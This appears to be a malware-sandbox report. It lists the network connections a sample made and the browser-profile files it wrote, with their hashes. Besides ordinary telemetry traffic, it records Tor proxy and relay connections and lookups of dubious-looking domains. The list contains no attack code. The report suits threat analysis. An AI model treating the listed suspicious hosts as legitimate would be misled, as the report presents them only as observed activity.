US 8.8.8.8:53 cdn.mwbsys.com udp
ES 18.172.226.32:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
US 8.8.8.8:53 77.89.210.3.in-addr.arpa udp
US 8.8.8.8:53 74.19.199.152.in-addr.arpa udp
GB 92.123.128.187:443 www.bing.com tcp
GB 92.123.128.187:443 www.bing.com tcp
GB 92.123.128.187:443 www.bing.com udp
US 8.8.8.8:53 187.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 92.123.128.181:443 th.bing.com tcp
GB 92.123.128.181:443 th.bing.com tcp
GB 92.123.128.169:443 th.bing.com tcp
GB 92.123.128.169:443 th.bing.com tcp
US 8.8.8.8:53 181.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 169.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 camo.githubusercontent.com udp
US 185.199.108.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.114.21:443 collector.github.com tcp
US 140.82.114.21:443 collector.github.com tcp
DE 140.82.121.5:443 api.github.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 21.114.82.140.in-addr.arpa udp
US 185.199.109.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 api2.amplitude.com udp
US 54.214.97.231:443 api2.amplitude.com tcp
GB 92.123.128.187:443 th.bing.com udp
DE 140.82.121.5:443 api.github.com tcp
US 8.8.8.8:53 231.97.214.54.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:51034 tcp
DE 217.79.179.177:9001 tcp
US 199.254.238.52:443 tcp
US 8.8.8.8:53 177.179.79.217.in-addr.arpa udp
FR 212.47.233.86:9001 tcp
DE 138.201.196.252:9993 tcp
US 8.8.8.8:53 86.233.47.212.in-addr.arpa udp
US 8.8.8.8:53 252.196.201.138.in-addr.arpa udp
US 8.8.8.8:53 holocron.mwbsys.com udp
US 44.208.104.213:443 holocron.mwbsys.com tcp
US 8.8.8.8:53 sirius.mwbsys.com udp
US 3.210.89.77:443 sirius.mwbsys.com tcp
US 8.8.8.8:53 213.104.208.44.in-addr.arpa udp
US 8.8.8.8:53 hubble.mb-cosmos.com udp
ES 18.172.213.38:443 hubble.mb-cosmos.com tcp
US 8.8.8.8:53 38.213.172.18.in-addr.arpa udp
US 8.8.8.8:53 telemetry.malwarebytes.com udp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
GB 92.123.128.146:443 www.bing.com udp
GB 92.123.128.146:443 www.bing.com tcp
US 8.8.8.8:53 146.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 92.123.128.169:443 th.bing.com udp
GB 92.123.128.161:443 th.bing.com udp
GB 92.123.128.161:443 th.bing.com udp
GB 92.123.128.169:443 th.bing.com udp
US 8.8.8.8:53 161.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.111.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.108.133:443 camo.githubusercontent.com tcp
US 185.199.111.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
DE 140.82.121.6:443 api.github.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
DE 140.82.121.6:443 api.github.com tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.109.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
N/A 127.0.0.1:9050 tcp
US 8.8.8.8:53 api2.amplitude.com udp
US 18.246.205.124:443 api2.amplitude.com tcp
US 8.8.8.8:53 124.205.246.18.in-addr.arpa udp
US 8.8.8.8:53 api.github.com udp
GB 92.123.128.161:443 www.bing.com tcp
DE 140.82.121.5:443 api.github.com tcp
LT 94.244.80.60:80 tcp
US 8.8.8.8:53 highway-traffic.com udp
US 8.8.8.8:53 frequentwin.com udp
US 8.8.8.8:53 www.vikingwebscanner.com udp
US 8.8.8.8:53 searchdusty.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 64.157.39.54.in-addr.arpa udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 sirius.mwbsys.com udp
US 3.210.89.77:443 sirius.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
DE 18.155.145.12:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 12.145.155.18.in-addr.arpa udp
US 8.8.8.8:53 holocron.mwbsys.com udp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 8.8.8.8:53 api2.amplitude.com udp
US 52.42.215.144:443 api2.amplitude.com tcp
US 8.8.8.8:53 hubble.mb-cosmos.com udp
US 8.8.8.8:53 144.215.42.52.in-addr.arpa udp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 8.8.8.8:53 64.145.155.18.in-addr.arpa udp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.38.233:80 crl.usertrust.com tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 172.64.149.23:80 crl.comodoca.com tcp
US 8.8.8.8:53 telemetry.malwarebytes.com udp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
US 8.8.8.8:53 telemetry.malwarebytes.com udp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.111.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.112.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
DE 140.82.121.6:443 api.github.com tcp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 185.199.109.133:443 camo.githubusercontent.com tcp
US 8.8.8.8:53 api2.amplitude.com udp
US 35.167.65.36:443 api2.amplitude.com tcp
US 8.8.8.8:53 bestsecuritycentral.com udp
US 8.8.8.8:53 holocron.mwbsys.com udp
US 34.232.165.72:443 holocron.mwbsys.com tcp
US 8.8.8.8:53 hubble.mb-cosmos.com udp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 8.8.8.8:53 telemetry.malwarebytes.com udp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 8.8.8.8:53 telemetry.malwarebytes.com udp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 8.8.8.8:53 telemetry.malwarebytes.com udp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp
DE 18.155.145.64:443 hubble.mb-cosmos.com tcp

Files

\??\pipe\crashpad_4164_YFTJFPZDHZLHKNPK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4b852b04369d211cefa80a91731ddd8b
SHA1 00204527cee6994b79cafd41ea9418edb813d691
SHA256 4f42970b9882d7f7e0e66165f73c4625ad83b0f11afa6284a9a40204f6d15b13
SHA512 9469837e07fc60f207e3403a06e320a778af971a48a47ac656b0c953167216bb785c5ccfc47eb340ad8d2c434cb8633d5b54eeb43a3dc7d3b03438980fd413be

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 078844a6f8d0440bcae827fc8c36660e
SHA1 30b0c7fde29b7dcdd13be1ace3585aaee593956a
SHA256 e0b6ff6b3dcabebb9216544ac33d4d6b6400f05e1cc7d2cc8ded0d2bf6c031be
SHA512 51ec375577565744c840b03a5a99690823ec0ac09e32835f11d68901b649ae3c6dc0355206f96b887f3ed68098717afba98367101b08bfc037962fe1dfb2270e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a002620189cb5c40e289a1e053db09a6
SHA1 3f130ebe59f9939873b1a0fdca888e2ea73bd9a2
SHA256 e526841018cecf2de1d3e41870045947300aa2778465fbf6d68fa691eb70219c
SHA512 be5d5f2f28a7d67720206a4da9ed5756f9129b2c475832fd574550b417c5055496f5e2965ef680d14839a26778049b1ef07b24c13668bf81b5af48c7c9235f7d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 04687507dba911a9136fbc7d013922b7
SHA1 3f5643c1331b5f66628fbe1f3b326b75d0ff65b6
SHA256 10eff600d7152d7d7e696f43a0760d2a9e5577ad068abb32d2bbae7aa2a32c2d
SHA512 7402caf022f9493de96d006c09172792da21f6eb18bd0540f4fb3ca27123521b2c850499281c91d992c67d3a47acc6e7b5d86eff12166c22d01c3121ebdf5076

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e05d70da9f76f7e593c21c3ed816cecb
SHA1 0723fca6bd2cbcdfc401f22a473c1204e14fa89a
SHA256 e4b9692850d953ca9cd3b2b908e6c6b1e6f2607b2970e2a6eee0d4ec01b49b17
SHA512 7cf714b820209f9223d91522606569a3c829ed5b1b41b5693b1b3b30aa690f1dede596609489677dc747a1b44c0cf6b342154b54907f61d004c3021be2194378

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 d92c58df040b17862d84d7ec9920538e
SHA1 e892448cf4e8653ebd2857ad326ff98384ab49ac
SHA256 cd4e12819070f50275154b23d08c4acd4966172d05c8722b197de1ac0fa08bb5
SHA512 6c0a5fdee0864ab55fea176c2d28177ea4796cce6fa9e9b83f4456ca92b16d5fe4dd9d777f3795981a22babba3bad30e88a3902daec113a79b632174767cf7f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5817e8.TMP

MD5 a3baedaa286d1dcbeaf6e6a86ca2f085
SHA1 41b1f734ce2583e7ee9f37a6bb51e52bcec5112c
SHA256 5930e7faa1e18f16e27b1f5ac1fcaf14fef7b7b771ba752d102c2dc8e68d5761
SHA512 b14711f7ad15bb252af2a92b2d3cc6ec2e22c05a9a360dabf10c66f834927863d05b1a847ba84d4fd5f539dd4a04d1d43c4f1c5aca9b45ab385a8a50f92ee3bb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 5b566e8de468a51c7c0064812c7dc202
SHA1 936b76a5f3c50c136df7de6db59d6c8c7ef9bedf
SHA256 22509c5e03e7f0a5e550eb8b736232f31fba91ac8cfc3335e6269e0a726cc613
SHA512 212e5449f7402e75ff5b59e30bf3937850a2fd078753642e348b8a8744778182a61e477efe532125cf065b5fd7a1b16e3097ec4588eab681fe54fbad84f4da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 3e86c8d29561a2b4fac3707f6ace8497
SHA1 a5500f40a8074924b751947e8add7a1dce19c2fd
SHA256 e3dc2408136e4467e99ac0f8c76cecbee667c2a67004bc8169c056b6143d5cea
SHA512 406c17f9fa18c399cd20383df0a699c44b213b483444cfac64ae30ff9e1301f431c8f334e74d35d4a18c479c3262394c10a2b8d2812c4a721d65b8c2717ffd8f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 27c3872bffc3245b9e60678492306112
SHA1 2d8e0d79150debce33a9004a671302f2b01cb1fd
SHA256 b124bcd5a3a223bfb1a387ad841605e2bd90dc2fed799f9b4586d8d3cc8b310c
SHA512 13827e875e58d929b416be7586af942f3d736f4d4ba670e3d0d0f223ad4e620ed6710ea430cafe04e552055656a2307df30a8a6defe1af05504a8f119980e4a6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 78f0999716ef7fa2f1ef1f8f1e9fec00
SHA1 e485a70bb3492978098bcef2091e8d8281a9cf9c
SHA256 381b824a051a51d94c80dc0ea8f6c498aa960151ede5ab2846b0a4650720adb6
SHA512 e70b0a2a51ff19b7891000ca1686e4aeacd41da8479663081c3b0a1abcd27b122a45859d8b550a577c685d70c28940a88d2229d620d97b07c0aa17dd129b44e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024

MD5 5e28e72b443ded036a4cf369d0dda3bf
SHA1 0500de4480a54243b12d096745c6ba04c9479e66
SHA256 15fc7a054efbb9f76d937448fbb4814d7b3f25a6d137e24c1a69e32947eae71e
SHA512 7d17a5248e54e4dda8fd17a4d662edbb274629161a1e25b3b7f7f5112541663a5040788177268c53b2c78bc7e6d2204ccfb342d93c2ceec0a12d8a41788c088b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c9872329b269e83729c12f65b2e498f2
SHA1 5d2254d604b6dde66cbbeb3b8a72b0d87ad5c4ee
SHA256 666bd28014d0c354854e4500e59965c62462583cb382e3226febaf378984f65a
SHA512 5a861c626b0697a9b1097973fbef24f0fd653a4c19b05b022131294a7e1762469944c09171cb307eec0fb2f0d25927615d75d7d6dbe0067a75d6996d3b31ff66

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 072cd1f8678dbcb2a0b5af90ab257ce3
SHA1 ea290b721c0b17cff56b533571cdda4e50d11857
SHA256 dc599a4d11b0c41059aeff169af35e4d39616afece7741ece41f64cd6c88578f
SHA512 870b02a000d0883922031ab3c9f238f7fbdec4e4a100123009b4d4c50d22fb324de3d436bdf3cd816dc23de35292deda1b1bbe2dba38c708e0d930e1323eee95

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 d394d3ae0322d912e9a9c08751ffd3a3
SHA1 d1e48ece1230295a73ca0bc1cf1b7cac9581c9b9
SHA256 08014d4ba59c8f09167b818f24dde3dac02d1666dbddd5787ebda6087f2eb13d
SHA512 39bc7ce4a4f199f4c0979b06e5d572c4b4dd347792f092f7e39a1a4b777cf0846bab3af3bc00c3dd4da59654528bb0ecc8ac5c64f3c21d976442cbcf807af78b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b03f9a0115fe603c24aa7a43a2ecfc10
SHA1 64f769ebc812bdd0a51f0e24fad6c723f3c9daab
SHA256 f106274db1e8fec57f94c1a0b810007e3b8603f4b7dd97addef3a5de93b4a68b
SHA512 68a3aa9aebe8a138d4bb6a4bec9c583555eceeb750a63167f9debe589ee7c6658b472b7529d4d9d04bd43fda615563dc3ca6192066f15081c078f921667bf6db

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 be4d48868489c9b8bc9f30559a891437
SHA1 128ff13258b364883844f5bbccb815f8991d3346
SHA256 cbf672014bd14f832d4219a34413c78ff1c691d3318f405c5eca5e4cd2c22faf
SHA512 ab1478b2dd127a8fe0bec0f0f32a0de718c658bb8cd9209e6541c41d1422319bd60caed7244ec6a8ba29e8c438a3819d63157bcd95710bd10f00cfbdc37248c7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 bde0fa8083790a419883cb9c775538ad
SHA1 968206784b2172865a05d3a2d526abad71e43a03
SHA256 449fb8be9d67affb9a76de5a24a9f68032002a65ec6412bbf7ba204a54a44437
SHA512 53320a5e027b6943327ad51913668b266a316aec99e802c0c4eba08777ccd03555d49002e5ae66b29178e5aa10fc78f3c4f3beb5f215a3649629c874c64af0ef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d07888068e4ba980db14d11d36bd4151
SHA1 81d2af1b2883f1eb0a5c1eee26122d3eb25a8811
SHA256 fea8682c000160b244d9b6cf23f04b6766435794566be457df30d0060eaa9e04
SHA512 038a4a591ea5120dea9d6191bbd285af661549062140799deb03d0ff5fa995976c9fd9abc0c139436313b8a6993e1f254080807afca9f0bec7be30b3c2f7c5b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 691e74746f7dff1fa274d597603e68ca
SHA1 1978d1fbc3bb4994bb05ec1595c4957bf0f92d97
SHA256 98a78e2fe71949cd763df71789180c00d77231b4f740ecb838cc43141187a291
SHA512 257687de7f329e16ccb3e9a9123797c21dc8ae9ec913707767a4ddd89d56759919c6b80bd0c6d41f1bf9fc94a1d6474a1a1ea9a4d57367d32882bdecab52eae2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e1b45169ebca0dceadb0f45697799d62
SHA1 803604277318898e6f5c6fb92270ca83b5609cd5
SHA256 4c0224fb7cc26ccf74f5be586f18401db57cce935c767a446659b828a7b5ee60
SHA512 357965b8d5cfaf773dbd9b371d7e308d1c86a6c428e542adbfe6bac34a7d2061d0a2f59e84e5b42768930e9b109e9e9f2a87e95cf26b3a69cbff05654ee42b4e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9ffb5f81e8eccd0963c46cbfea1abc20
SHA1 a02a610afd3543de215565bc488a4343bb5c1a59
SHA256 3a654b499247e59e34040f3b192a0069e8f3904e2398cbed90e86d981378e8bc
SHA512 2d21e18ef3f800e6e43b8cf03639d04510433c04215923f5a96432a8aa361fdda282cd444210150d9dbf8f028825d5bc8a451fd53bd3e0c9528eeb80d6e86597

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 858cf9d0c63db9c506dcc025ba0623cc
SHA1 18635b58bb9dfda7835a03cc5805f4d87a0e0479
SHA256 2f04deb52f84922d4d397eaf9f20a38821366eb1aa64f79e5b8a040b9670a8e6
SHA512 f00dc36de78d16ed870f4c6c25b9dacf137f1408281f171329119f060bd6c5fb870eb1a3996a1775a2c68cc41f94ca8c3ff310e2c621be266ec7cad57f6fb0e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4792d4c2cf682c83686f404b16bb0cb5
SHA1 2c20ad7c37aaf14038a95e81fd9a8c53c759333d
SHA256 2ffe6c79e4818afd1d72a4110101156771870c307e81c2d6eac9502468979d0b
SHA512 049803117c3d48e4dc0cc6b2a4faf6c94a9b79f6756459fdc351a6b99e9c5e132c976dd1baf04033bfdb476f359be77238a2cc797843a6b43be64f2b5952764b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4c67c0fc27813b2625b33118640da171
SHA1 589723252aacc65bc5059c6b8b458e4083cb2a16
SHA256 602a652bf389c4eaec222962abbabc76fe82fb79edd72618d34acbe5251440bd
SHA512 41fab682229e992e62449e39680b9d4763efdb812a1e8ce7dfb152e91ef3a7d9585f8e58f96e50d447453b2f074cc860e550ffd321bd9c3a9ba125651bef7085

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 13b21681c68e9f8a6dd8e94f06c67a2d
SHA1 fcb0321618c6fb35acc4bdb12b52ab506698bfee
SHA256 720569e3476aa8a1f95f1d315e0311841c7382ea77e83943d29fd04647e98215
SHA512 3f8e10911eee65b612099947e1d9e05186fac219a236e1b65af2ea62026d263e75fc9f05cfd484b539152b575d56900eda1160aa532b231de7f3a9ccfbb0e182

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

MD5 063fe934b18300c766e7279114db4b67
SHA1 d7e71855cf6e8d1e7fbaa763223857f50cd1d4bd
SHA256 8745914e0214bcd9d2e6a841f0679a81084ef3fc3d99125876bee26653f4253e
SHA512 9d0dfc21306b3a56c2ecdf1265392271969e3765e161e117c8765125b34793e24458217cf6514b364f351f47e65baaaf5856be0d13406a789f844d6ba8c7075f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

MD5 e0595142a80771d317d27440fd29b8e6
SHA1 db3710d0d8d60dcb64430c342c6fd921d6792fcd
SHA256 3ba245011d9a8ade367074a3774a786f50ca51d71a83956dbb0ad2647a14d7ed
SHA512 6d298295955fce4166720ee7cc42bf4562ff311b6820025a7ea710a19dd8553d8677fe194876db5e2e6440d9d21aeb603a6b3fcd73f656405428d4ec00dba288

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a86e4.TMP

MD5 2c4920313a50ccbf6a143dc693172b52
SHA1 8ae94b516be9c3e4e0b6c2ef880be9de9416198f
SHA256 0cbf43f4b08f5766a6e835b1d16abaf09d06a004a306f2822b15cb28d1c4f38a
SHA512 d691c35026cb750a40e435ddaaf0e0c11a77b28d9751c25faaeb808dd656bd53e427584235567facbc7936aea6d9fb0d48c8502e4eba17db5ba52a0ffe4d0a7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2b963de10eb023d2ab3a85a69a058a50
SHA1 651b5411fd864c3e0173628a64f90caa49a73d55
SHA256 a5e9b121360dd04264e57b20a3912c881e3b1d61d49ca97d8c448870f53f7513
SHA512 4022e72b07a831b54abbc5495f5b9b64e481377e74d07ad52772ab3d8df9b9ec53a372c9ec7e24d5ac2481ffb0238e3050ed20c5f3f11d0586162ae7ebdf5e87

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 06c7ea2bd9e79c728eeedda47a0c0975
SHA1 0e80761ab11f55fbd431584836046cc0d3d35f47
SHA256 4cf97bdd63a26e024cf301cb58cf152ec409228b4b5bd6e4cada96414078339f
SHA512 e71f67cbed30ac84a99a5d5bd9649e57e49ec79357d21b492d79dfd90be305c75f10ced50ba84a8627601a396e45e89f9a13dd79979e1a5e5f23165acf7c560d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 69e0ea1193b1c7406196f24c3bd7a5da
SHA1 802f3c32431976f2cfebc9bda87490741a207e1c
SHA256 ec35e0963ae4ed9598c045f24539a2f00d0f8df005cfb551c8c73238731a8757
SHA512 359d09c2b98302fd76c8a6b7f3690a6f5036c307a1ce3961569ffd12a34225fb7cf467e1b4e99e88a8ed085d34884b36929f8cd46076bca324f353c7c98984b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 030ead753e06c0787c9375c8c23349cf
SHA1 efe2616a499f5db281b71887e34ab7f2179940be
SHA256 4412b1d9e0d9cbe34248e1eb638d63a2e061e94567790ea953e1155b928965d7
SHA512 f7de99b9232657361eae3b394f96b4f7b042b46c7f3cd3662b1923ade18773f05b2cf6cb0e44204c155f77f1912024e7365b821a12edafd4865927d0b04b78a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f5c26be437b998b87a2090d4daa50564
SHA1 15e926b2e9c83be7dfc18c0b492ac1205e52cfc9
SHA256 03179318f57d6261f56d91c9d1749c6222abb5816b8e8acaf278e2b30b84aefc
SHA512 077161cb480a89c096734008414f9465b31cee9666b6886f5c29ca025088896f1c5efd0feff31d605d436712edc93002bab1c93069409f7f5986dc5e0b339ce5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4f02c8c369c78aca87aa735c88267a64
SHA1 1e81738ff85c5bdd3cddb68c17ac3e2733412e4a
SHA256 3066cd8e92e3bc0c608ea12f32b79c04c3ffaaa3a0f5c81c0fec53b4581dc8c0
SHA512 863085e0c813647b5205e51f3731abf5487bdcb70291b74f95d774cc48173fea32031096b92efbe2f08b0560417e4e3fa80a143fd31df1585c2c51e4bce832bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3e408c56a7510535031325afb0a1e633
SHA1 a55208b2d3f169ad89f118d6abeafb4b7f27e075
SHA256 2a6a38768b00a373b25c0a2f3ea8aac5da897f22e15c04b0ded7f4a7aae13a51
SHA512 814ca7942b915e0300ecf5b67d943d0cf282fe26a687449a62c5195a07a56eed924e1bdc51689f50c678bba39a5f202a7849d85443cfc1a7ded7975d78c0d26b

C:\Users\Admin\Downloads\Unconfirmed 487311.crdownload

MD5 86d68c9cdc087c76e48a453978b63b7c
SHA1 b8a684a8f125ceb86739ff6438d283dbafda714a
SHA256 df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32
SHA512 dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

